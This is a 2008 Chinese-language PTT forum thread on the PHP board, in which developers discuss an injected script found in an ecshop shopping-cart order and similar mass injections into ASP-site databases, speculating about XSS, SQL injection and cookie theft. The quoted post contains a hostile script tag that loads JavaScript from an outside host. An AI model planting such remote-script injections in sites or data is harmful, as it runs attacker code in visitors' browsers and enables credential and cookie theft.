作者JYHuang (夏天到了,冷不起来了说)
看板PHP
标题Re: [请益] 我的客户被诈骗集团打电话了..
时间Fri Jun 6 21:33:13 2008
※ 引述《reflynet ()》之铭言:
: 首先可能要先说明一下,我有个购物车是用ecshop的.
: 前几天有一笔订单的内文出现了<script src="http://i69s.cn/c.js"></script>
: 当下不以为意,就把那一笔订单删掉了..
==恕删==
看到这我想到前阵子帮客户做系统转移的程式改写时
(ASP -> PHP)
发现客户的资料库被入侵修改,
一堆资料都被加了一堆类似上面的Script
另一个听到案例也是用ASP
不知道是不是IIS有漏洞的关系
不知道您的购物车是用何种程式呢?
--
※ 发信站: 批踢踢实业坊(ptt.cc)
◆ From: 118.160.142.121
1F:推 ybite:这种XSS攻击应该和ISS关系不大,是购物车程式的问题吧 06/06 21:34
2F:→ JYHuang:因为我遇到的情形是整个资料库都被加料 06/06 22:29
3F:→ JYHuang:XSS攻击应该比较难弄到整个资料库.. 06/06 22:30
4F:→ ybite:应该是搭配了一些AJAX上的漏洞的关系... 06/06 22:47
5F:推 reflynet:这是程式在收来自使用者资料的时候没有过滤完整.. 06/06 23:05
6F:→ reflynet:不管是c, perl, asp, cfm, php, aspx 都有可能发生.. 06/06 23:06
7F:推 rabbithenry:这类型的攻击大多是偷得使用者Cookie的资料 06/06 23:18
8F:→ rabbithenry:毕竟Ajax有跨网域限制,偷帐号密码容易多了 06/06 23:19
9F:→ rabbithenry:尤其拿到管理员帐号权限=无所不能... 06/06 23:19
10F:→ arianda:sql injection也有可能 06/07 01:30